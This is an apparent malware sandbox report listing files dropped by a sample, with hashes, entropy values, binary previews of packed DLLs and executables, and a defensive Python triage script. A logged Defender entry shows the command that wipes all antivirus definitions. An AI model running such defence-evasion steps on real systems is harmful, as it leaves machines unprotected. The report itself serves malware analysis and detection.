Preview:.\_.:..d..~"..@...Z./)..:.&.|?...'.o.WP.h.)hS.D. ..qD...dQ......7u..$..I.Z.c...3[..y..*.i...i0.)....'~*.o..+.c....-.}.........../._.=Q\y.,.J>.n...qB....G....Uu....]c.l>..Pa_a..W0t.>.]e"...g..F........G............f.k......(..1>+pMP..~h.........P..Q.....>.\....U.B........a...u........j..O{.T....X.......m.y=S.T.H.V.l.).XHI{.4H7...4..q.B..T..c.O.n..F |.E...0.6=|.p..;... .\...y<.}1=...c+."...N.{....}=..[=(..*oV.......4..)Ih....KR..[.;t.hsp...z!ERN.I........#...}%r.gE.${....G...C..I..7}.L|<....m.5.N5H3...aH'....t(..v..lLe(.......k|....+..%.i.:..X*.W....r).n..R.W.'v....GO.F_Z....(....aP.p,.x....a^.Y....J...&.)D.B#.hb...3..z{.....x.3W..=2.>...AM^=...=.M.....O......Q$|I.E...9}-a...;...G....Q.F..=....y.X....]........)J..~N...,.8.?....G.. lH...GJ+*..G..Z+j...C..GI% ..I.K.q.5.......+S.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..
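The entries in this list are what you actually pivot on when triaging dropped files: the 8-bit entropy and the Encrypted flag separate packed or encrypted payloads (the 148480-byte blob above at 7.9987 bits per byte) from plain code chunks, the hashes feed reputation lookups, and the libmagic File Type is the weakest field of the lot, since headerless memory dumps get guessed from their first opcode bytes (the "DOS executable (COM, 0x8C-variant)" verdict further down is that kind of guess, not evidence of a real COM file). The following script is an added example, not part of the Joe Sandbox report or its tooling: it recomputes the same per-file fields (size, 8-bit Shannon entropy, MD5/SHA1/SHA-256/SHA-512) over constructed sample buffers, applies an assumed entropy threshold of 7.9 bits per byte for the Encrypted flag (the sandbox's real cut-off is not stated on this page), and adds an explicit MZ/PE header check so a "data" or "COM" verdict can be cross-checked. SSDEEP is left out because it needs a third-party binding.

```python
import hashlib
import math
from collections import Counter

# Assumed threshold for flagging a buffer as encrypted/packed. The report's own
# cut-off is not documented here; 7.9 bits/byte is a common triage choice.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty or constant input, 8.0 max)."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same order the report lists them."""
    return {
        name: hashlib.new(name, data).hexdigest().upper()
        for name in ("md5", "sha1", "sha256", "sha512")
    }


def is_pe(data: bytes) -> bool:
    """True only if the buffer carries an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature.

    Injected-code chunks dumped from memory usually fail this, which is why the
    sandbox falls back to 'data' or a libmagic opcode guess for their File Type.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """Rebuild the report's per-file fields for one dropped buffer."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= threshold,
        "has_pe_header": is_pe(data),
        **digests(data),
    }


def constructed_samples() -> dict:
    """Synthetic buffers standing in for dropped files (constructed, not from the sample)."""
    # Every byte value equally often: maximal entropy, the signature of an encrypted payload.
    uniform = bytes(range(256)) * 16
    # One repeated byte: zero entropy, e.g. a zero-filled allocation.
    constant = b"\x00" * 4096
    # Minimal MZ stub with a valid e_lfanew and PE signature, nothing else.
    pe_stub = bytearray(0x80)
    pe_stub[:2] = b"MZ"
    pe_stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
    pe_stub[0x40:0x44] = b"PE\x00\x00"
    # Headerless x86 code chunk starting with 0x8C (mov r/m16, Sreg): libmagic would
    # call this a 'DOS executable (COM, 0x8C-variant)' even though it has no header.
    code_chunk = b"\x8c\xd8\x8e\xc0\x55\x8b\xec\x83\xec\x10" * 200
    return {
        "uniform": uniform,
        "constant": constant,
        "pe_stub": bytes(pe_stub),
        "code_chunk": code_chunk,
    }


def triage_all(samples: dict) -> dict:
    return {name: triage(buf) for name, buf in samples.items()}


if __name__ == "__main__":
    for name, fields in triage_all(constructed_samples()).items():
        print(f"{name}: size={fields['size']} entropy={fields['entropy']} "
              f"encrypted={fields['encrypted']} pe={fields['has_pe_header']} "
              f"sha256={fields['sha256']}")
```

Run it on a real dropped-files directory by replacing `constructed_samples()` with a loop over `open(path, "rb").read()`; a buffer that reports `encrypted=True` with `has_pe_header=False` is the typical shape of a stage that still has to be decrypted in memory before it can be analysed.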
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):41984
Entropy (8bit):6.269219511585888
Encrypted:false
SSDEEP:768:npJsWVycd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4k+:nHsWccd0vtmgMbFuz08QuklMBNIQ
MD5:2D29139B7632A63D796D2F98C7EDB7C9
SHA1:D5C8791BCBC6237E04525EB5C9AC9DF34DA19132
SHA-256:25D0C37D809DF03EA5B5ED99F83674928A62C0511F726D078BC6F7EFB723A0B1
SHA-512:F663F9E356EA64E3E0805973292DF438742D15248B5FC5DD9137BFAD108D9E38EEE990A686FB5BDAFD514744C9C4055D21C7FCD3A39EE455818AD72A85D755AC
Malicious:false
Preview:>...m0_$@......8C..`.a..=..`.a..=..@T.!.?sp....c;......`C.......<.......?...............?.......TZ...FJ..FJ..FJ..GJ.j.a.-.J.P...z.h.-.C.N...k.o.-.K.R...z.h.-.T.W...u.k.............@NJ.....HNJ.....PNJ.....XNJ.....hNJ.....pNJ.....xNJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......OJ......OJ......OJ......OJ..... OJ.....(OJ.....0OJ. ...8OJ.!...@OJ."....GJ.#...HOJ.$...POJ.%...XOJ.&...`OJ.'...hOJ.)...pOJ.*...xOJ.+....OJ.,....OJ.-....OJ./....OJ.6....OJ.7....OJ.8....OJ.9....OJ.>....OJ.?....OJ.@....OJ.A....OJ.C....OJ.D....OJ.F....OJ.G....OJ.I....PJ.J....PJ.K....PJ.N....PJ.O... PJ.P...(PJ.V...0PJ.W...8PJ.Z...@PJ.e...HPJ.....PPJ.....TPJ.....`PJ.....lPJ......GJ.....xPJ......PJ......PJ......PJ.....P+J......PJ......PJ......PJ......PJ......PJ......PJ......FJ......FJ......PJ......PJ......QJ......QJ..... QJ.....,QJ.....8QJ.....DQJ.....PQJ.....\QJ.....hQJ.....tQJ. ....QJ.!....QJ."....QJ.#....QJ.$....QJ.%....QJ.&....QJ
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):59392
Entropy (8bit):6.576069677992433
Encrypted:false
SSDEEP:1536:fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubbm:mLthfhnueoMmOqDoioO5bLezW9FfTue
MD5:963A4F36BB66B11B13A128A5242B90B0
SHA1:77A139BF949B509F01E7620C5A1F83678D905F1D
SHA-256:912EE8A0A03BC4612DC42662B2A17032D5787209520AE7E3A93A6C02F5799A79
SHA-512:BBFE95F594726B638A01D66D754031329475A0C5B8E462F507363DBE100E933ADA408B3C6A61A39FFC8F07034CB4D3E1AC0945B9DD3E0F97DF462275C55160BD
Malicious:false
Preview:..I....E.E...u.@.x.L....E.. ..x..M..E.P......E.P...Q.....]..u.Q.M.SV.w......t.....d....d.....d...M..d.._^..[....U....SV.u...W.........U..:..........J.....u.j.h.L.j.j.............t..u....u.VR.u............~..uM.6......u.../...E....0.u..u........Q..|....L..t..I8.A..D...|...t..@8.@..3..o.~..uI.6.M.R.u..u..>./..P..E...P.W..M.........I..|....D..t..@8.p..D...|....j.h.L.j.j..'...j.hx.L.j.j..-..._^[....U........E.S3..E.....V.@...M..u.E.].].].].]..]..].W.........E.9..............u.j.h.L.Sj..v...j.X9A.u.......@..E..u.j.hx.L.Sj..O....}..M.Q.......... ...Y..y.j.S.*...3.@f9E.uM.U..E.......t?......PQ.7.M.........x&.......t.f9.....u..E.........u..E......}.3.j.GZ....j.Z.......3..........P.B...Y..t'.8.P..U..U...t.............u.U.3.....]..E....t/............E...@..4....G...;.r.u.3.E.U........t}..M...tt.u..z....j....E.Zf9......uKW..p.I..M...@..........f..f;.u.h..I...h.I..M..E.E.G..F.j.Z....x...E.t....A....M.;.r..u..E...}..E.}.t..E..E......E.E.P..l.I.j .E.SP.V
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):68608
Entropy (8bit):6.540657980376014
Encrypted:false
SSDEEP:1536:yVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwAE:pPtCZEMnVIPPBxT/sZydTmo
MD5:C3F2F9D2C58E5C65A456D712A04805EC
SHA1:467ADE6888E946ECDCE48AC8A9A46CF3A00FC0EF
SHA-256:67B8C664C1144A63C24084164CAD6AA809959989A6E1F9AC5F34988C49CA0E65
SHA-512:58307B6047B97F0F31B8699E61EED671ADAC47104E9161DEB32682F8C8DF4FD8FD6872CE76C2389D29B00E13661FFA06019B291975AC0F6B1C1820E1F794C154
Malicious:false
Preview:....I.S.u..u..u.S.7....I.SSS.u.....I.....!.......S.v<...v..q....D$$...F@....]....?...`....O...j.....I..o...3.f.......E.jXj.....E.P.....e............E.E..E.X....E.tL..E.....P.E..tL..E......E......E.`uL.....I...u.2.............P..D...\....u.hhuL..u..u..`..2........$.....t..D$p.D$t..i.....$.....u.j.h.EL..(..$.....u.j.h.FL.....$.......5...j.h.FL..L$h..... .....$....EA06.......L$`.8...E...$....j...$......$.....0..$.....]$...........D$8P.D$.PQ..$.....}.....$.......$...........D$.j.^j....D$P...f.D$4.\$D.\$H.\$L.........Yj..L$,.|$\....I.._.._.._..|$<f.D$6..y...D$L..D$(.D$(P..x...|$.3.@.\$T.D$P9D$L.......D$..L$(..F.t$....P.D$(.y..f.|$0.w..D$........D$(......L$(.}.....t..L$........D$(.A..D$,......L$(.A.....t..D$........\$(......L$(.0............D$.P.t$..\.....D$$.t$ V..1u-..$.....o...O...$.......R...$........y..j..,..0u:..$.....ho....$......:....$.......y..S.L$,.x...t$(.t$ .-..7u....,[..........V.{....t$.Y......L$,.....V.b....t$.Y.L$X.D$(P.tw...|$$........L$X.Q....v1.A.j..D..Zf
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
Entropy (8bit):6.640311027373874
Encrypted:false
SSDEEP:384:Igoyg/TcK9u8S14RBqp6iuuhi4jofD4hDvW9Sd2m2y6mC8qVVlWYrkJTyxtKYO9i:qygbcoSF7YmDvWQd2m2y6mC8qrkJTy/x
MD5:768556FEE102950970CB3685A712E6C3
SHA1:4325AB836343D850DF7F987C54C112291E5FC181
SHA-256:5AAEED715F0FB58EFF0BF70F387BE141B3D14D5A909B49E9DB7E2B095EDD320C
SHA-512:EE46A664080F1BCFD585417EF8A33197F159053AE856677E88DFAE6CC89597DC6B31AA2F01FD6CFD7F1FE2307DB5916DC95139920905C7A85307494989653480
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):54272
Entropy (8bit):6.619327587242789
Encrypted:false
SSDEEP:1536:2Xv+G/UXT6TvY464qvI932eOypvcLSDOSp5:2XvpgF4qv+32eOyKODOSp5
MD5:8A18D0C184A6F1ACF741CC330C405EEC
SHA1:75686776366FC6AABEFF430322AE4CDC0E413EC6
SHA-256:FB79A23FF6F19BE3905E3BD5D455A62D3ADF3AA77DD65B2C6067F6F3EB8FD07A
SHA-512:B4162D4C910D8393CB77C3183744D35C48BFD10B61048F268FFB81FC343B45C5717DD3B12844602A11A3CBFB29A5503192E407A757687C1EC2BB9269A5B63C71
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):6.515573994658731
Encrypted:false
SSDEEP:768:kfcqFYRzeyTrSgWuXQAgGMKYCk9zJSFajBVYCmBZ3A/4tjstG188K:lqFqaynB6GMKY99z+ajU1Rjv18n
MD5:7190EC4F81336EEE07BE8652BE327351
SHA1:C28388CFAE63260C52574176185251A434853D1D
SHA-256:494632EB8042259018F22BB23D2BAB18DE989FD505A92129D766219515CF3126
SHA-512:EB7FA8654E016246DF70F9470FCE359E8E5D2FC7DBE06F234EE5188859D76BBD6D379B4CC98CA6E68872CE621A2D86C1B0B39448F978D85E7EF1A5878ABC94B2
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):44032
Entropy (8bit):6.574189507059031
Encrypted:false
SSDEEP:768:lbHazf0Tye4Ur2+9BGmd9OTGQ1Dv7sMvLHfR/X:luZo2+9BGmdATGODv7xvTpv
MD5:1D33A1298B5467BDCCF0CD7DD5EA1236
SHA1:715233F3A23BA355020AA01C029C47691C6C2CC0
SHA-256:A4876320F65E332CEAC09E0C83638B209FFA1CD3806057BBD368C8F5079C9875
SHA-512:605B5D78FF761F8942433C98ED0678D9392B359E4CD99E9DF2F62CBD401294371B44B3C34B3CF747A0BB4DA1EB9B5E8DE015C89DA9FD9566D87243040424C4E7
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):6.380156182990265
Encrypted:false
SSDEEP:192:aNXXWle1fR+TIGRViFOaacQ8u66gJjbDrORg/4Sl1d5mgnlILA:aNn9+8si7acQi6w6Rg//l1dDiLA
MD5:620009F4A149CC8F565258BDBC9AC70C
SHA1:E1BF184CCB41B2B5CD192329653AAD5FB606AC16
SHA-256:0980C717933EBC993368D15B3BA4BC5A71DAF3FB778E84138193AD0F3A2715A1
SHA-512:09960E0AEFB2E9057426DFD5725E440F729316D586AB8DC6291AED762094905F2A929164A2EBD933BF7A3EE2AF4DFD00AB927ABBFEB3F108B10E81171D483EE3
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):24576
Entropy (8bit):6.683007775025292
Encrypted:false
SSDEEP:384:68h6v/WL5jEBUnHgPzTxkCqyzrWBheM7Cc+SaGQPaVNgJ/qedTBKujFxv5w:B5QUnHgPzFkzyPWBh2zGNVWNqexB9jFw
MD5:9D56F29524BD8EF16B2E3F8D57490206
SHA1:37A5A5FCCB22403B6AA4430417EC3D99A4A4110A
SHA-256:FC2399D47EDB8C66469BB25060DA2C1F25DE01E21AF40CE9A29558D3A3A3DAE3
SHA-512:A1488388505DA6AEE2D7FE3BC7A8239BEACA4D6472EE40CFFA02A657D5489B2621FCB65304FCA94FB04C94AE9A069AE28994FE00191FAD986D58F45AE77EF6A5
Malicious:false
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):143
Entropy (8bit):4.058927563492483
Encrypted:false
SSDEEP:3:x5WAXKAGMDg1AeUqt/vllpfrYZcFTS9gXeF+N:x4wDuAVqjvVg3F+N
MD5:835D7D5EA4EFD26937EA1894231418CA
SHA1:B131D21F7FC04E9B0F9D1E047307BEE3581EBF1F
SHA-256:47983BE9149D6792688AA72763F2E941A768AF9875ACA3E1CA18F0AAE75921B2
SHA-512:AC93D8D78E5D3F55DC68029F4382693955429EB765FB442C1AD9B12E56EA7104CF452192D1C30D90D66454F2FC83769B0B82D0083DE86B926B24A1487A447690
Malicious:false
Preview:perulesserpalacecorrespondence..MZ......................@...............................................!..L.!This program cannot be run in DOS
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):62464
Entropy (8bit):6.693843516682922
Encrypted:false
SSDEEP:1536:jC03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26Nu:70nEoXnmowS2u5hVOoQ7t8T6Y
MD5:156DEF4BF859FE09993C29354626891C
SHA1:C0834C05A615665A7E6CFE8DF75937E15F3C62DA
SHA-256:A771FD25611B7FE3A6EEA8ECD5201B6ECF202943FF55C937D1431560DDC36FFB
SHA-512:470AA4DE9EBF1372120EA1FF8A57DAE250816DA724EAC63357E32C3122430D5C992448817028D385C5AB01A4CE6D10EB093801E96564FE97662E3D813A7AE889
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:NlllulJnp/p:NllU
MD5:BC6DB77EB243BF62DC31267706650173
SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:@...e.................................X..............@..........
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8850847
                                                                                                                                                                                                                                Entropy (8bit):7.994454273476157
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:196608:rrF9uyJovsrurErvI9pWjgaAnajMsbSEo23fQC//OoLxhy:SyJMsrurEUWjJjIfoo4jLxhy
                                                                                                                                                                                                                                MD5:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                SHA1:99228F518FEA11218EE5128345A31837F1A188B7
                                                                                                                                                                                                                                SHA-256:E776DCED871CBC19B55D8BEF02608BC0E453E946CAF02F75047878B2BB92F531
                                                                                                                                                                                                                                SHA-512:00C59A3ED07AFBDBF4AEE4865FA83A2AB9CCF4A18DBB11C6EB1A43AE0526210EAE7D1B7A0677F27DA105413F6F4536A26C60E61FB0F1E39C3D333B38C38883F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...6.8f.........."....&............@..........@.........................................`.....................................................x....p...;...0...#..W..H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc....;...p...<..................@..@.reloc..X............T..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):894
                                                                                                                                                                                                                                Entropy (8bit):3.110091214968621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q58KRBubdpkoPAGdjrlsHNzk9+MlWlLehW51ICEsHNe:QOaqdmOFdjrlUNI+kWResLINUNe
                                                                                                                                                                                                                                MD5:3BC435D4822D7028D587098AC2657412
                                                                                                                                                                                                                                SHA1:CA48310D265C10B64CE418AC65C321CCC8E2233A
                                                                                                                                                                                                                                SHA-256:E3D1700B3420A4944B37DD78D287F503C5FE42CADBBA9220B6B3E16246A46B1A
                                                                                                                                                                                                                                SHA-512:84D60E2ADC6F002A25F432332F906A360DDBD00D222C4303FD92D6154821780C147C572B8CD69FE56BE393F863CC3D498F1F6E17C8562F77F7213ECEDEF17D4F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 0.8. .. 2.0.2.4. .1.6.:.4.1.:.4.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 0.8. .. 2.0.2.4. .1.6.:.4.1.:.4.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):119192
                                                                                                                                                                                                                                Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49944
                                                                                                                                                                                                                                Entropy (8bit):7.787272734180523
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:MXjTDOU1Mkw8KBJ7QlIRZcz63VPzH8y5GNexMpO/IjCVD0P5YiSyvEAMxkE4s:GnO7kwXBJ78OZENkB/IjCVDc7SyqxJ
                                                                                                                                                                                                                                MD5:980EFF7E635AD373ECC39885A03FBDC3
                                                                                                                                                                                                                                SHA1:9A3E9B13B6F32B207B065F5FCF140AECFD11B691
                                                                                                                                                                                                                                SHA-256:B4411706AFC8B40A25E638A59FE1789FA87E1CE54109BA7B5BD84C09C86804E1
                                                                                                                                                                                                                                SHA-512:241F9D3E25E219C7B9D12784AB525AB5DED58CA623BC950027B271C8DFB7C19E13536F0CAF937702F767413A6D775BED41B06902B778E4BAD2946917E16AD4EF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.............t....................................................`.............................................H....................0..8.....................................................@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60696
                                                                                                                                                                                                                                Entropy (8bit):7.826186640993217
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:dQm2JyhT7X84MYNbLlJRiQFM+pIWHIjLPj+7SyANx4:dQ9JyhT7nHnjFXeiIjLPj+6U
                                                                                                                                                                                                                                MD5:A8CB7698A8282DEFD6143536ED821EC9
                                                                                                                                                                                                                                SHA1:3D1B476B9C042D066DE16308D99F1633393A497A
                                                                                                                                                                                                                                SHA-256:40D53A382A78B305064A4F4DF50543D2227679313030C9EDF5EE82AF23BF8F4A
                                                                                                                                                                                                                                SHA-512:1445AE7DC7146AFBE391E131BAFF456445D7E96A3618BFEF36DC39AF978DD305E3A294ACD62EE91A050812C321A9EC298085C7AD4EB9B81E2E40E23C5A85F2CC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............P-.......................................P............`.........................................HL.......I.......@.......................L......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):107800
                                                                                                                                                                                                                                Entropy (8bit):7.9398737446938865
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:drlajXG60D6JCd/WQG+nA1kR6rLlG/iIjOql7ph:dsC60D6Y/WKAEggD7n
                                                                                                                                                                                                                                MD5:CCFAD3C08B9887E6CEA26DDCA2B90B73
                                                                                                                                                                                                                                SHA1:0E0FB641B386D57F87E69457FAF22DA259556A0D
                                                                                                                                                                                                                                SHA-256:BAD3948151D79B16776DB9A4A054033A6F2865CB065F53A623434C6B5C9F4AAD
                                                                                                                                                                                                                                SHA-512:3AF88779DB58DCAE4474C313B7D55F181F0678C24C16240E3B03721B18B66BDFB4E18D73A3CEF0C954D0B8E671CF667FC5E91B5F1027DE489A7039B39542B8CA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p................................................... ............`.............................................P.......................`'......................................................@...........................................UPX0....................................UPX1.....p.......d..................@....rsrc................h..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36632
                                                                                                                                                                                                                                Entropy (8bit):7.660102821783565
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:u665W8yKNUYvmiOhWzYda7jeWMl9pcgvIjOIOL5YiSyveAMxkEQ:TXg6iLYosugvIjOIO17Sy0xs
                                                                                                                                                                                                                                MD5:89F3C173F4CA120D643AAB73980ADE66
                                                                                                                                                                                                                                SHA1:E4038384B64985A978A6E53142324A7498285EC4
                                                                                                                                                                                                                                SHA-256:95B1F5EFF9D29EB6E7C6ED817A12CA33B67C76ACEA3CB4F677EC1E6812B28B67
